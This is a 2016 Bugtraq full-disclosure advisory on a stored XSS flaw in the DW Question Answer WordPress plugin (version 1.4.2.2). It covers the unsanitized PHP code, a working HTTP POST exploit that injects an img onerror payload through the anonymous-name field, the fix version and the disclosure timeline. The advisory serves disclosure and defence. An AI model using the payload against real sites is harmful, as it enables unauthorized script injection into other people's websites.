[<prev] [next>] [day] [month] [year] [list]
Message-ID: <56E25F48.2000708@gmail.com>
Date: Fri, 11 Mar 2016 11:31:44 +0530
From: Rahul Pratap Singh <techno.rps@...il.com>
To: bugtraq@...urityfocus.com
Subject: DW Question Answer Stored XSS Vulnerability
## FULL DISCLOSURE
#Product : DW Question Answer
#Exploit Author : Rahul Pratap Singh
#Version : 1.4.2.2
#Home page Link : https://wordpress.org/plugins/dw-question-answer/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 11/3/2016
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
"_dwqa_anonymous_name" parameter is not sanitized that leads to Stored XSS.
----------------------------------------
Vulnerable Code:
----------------------------------------
User.php
function dwqa_get_author( $post_id = false ) {
if ( !$post_id ) {
$post_id = get_the_ID();
}
$display_name = false;
if ( dwqa_is_anonymous( $post_id ) ) {
$anonymous_name = get_post_meta( $post_id, '_dwqa_anonymous_name', true );
if ( $anonymous_name ) {
$display_name = $anonymous_name;
} else {
$display_name = __( 'Anonymous', 'dwqa' );
}
} else {
$user_id = get_post_field( 'post_author', $post_id );
$display_name = get_the_author_meta( 'display_name', $user_id );
}
return apply_filters( 'dwqa_get_author', $display_name, $post_id );
}
----------------------------------------
Exploit:
----------------------------------------
POST /index.php/dwqa-ask-question/ HTTP/1.1
question-title=abc&question-content=%3Cp%3Eabc%3C%2Fp%3E&question-category=2&question-tag=abc&_dwqa_anonymous_email=
abc%40gmail.com&_dwqa_anonymous_name=%22%3E%3Cimg+src%3Dx+
onerror%3Dalert%281%29%3E%3C%21--&_wpnonce=
3164a8f439&_wp_http_referer=%2Fwp442%2Findex.php%2Fdwqa-ask-question%2F&dwqa-question-submit=Submit
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/03/dwqa_stored_xss.png
Fix:
Update to 1.4.2.3
Vulnerability Disclosure Timeline:
→ March 3, 2016 – Bug discovered, initial report to WordPress
→ March 7, 2016 – No response, Report sent again.
→ March 8, 2016 – WordPress response, plugin taken down
→ March 11, 2016 – Vendor deployed a patch
#######################################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
#######################################
Pub Ref:
https://wordpress.org/plugins/dw-question-answer/changelog/
Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)
Powered by blists - more mailing lists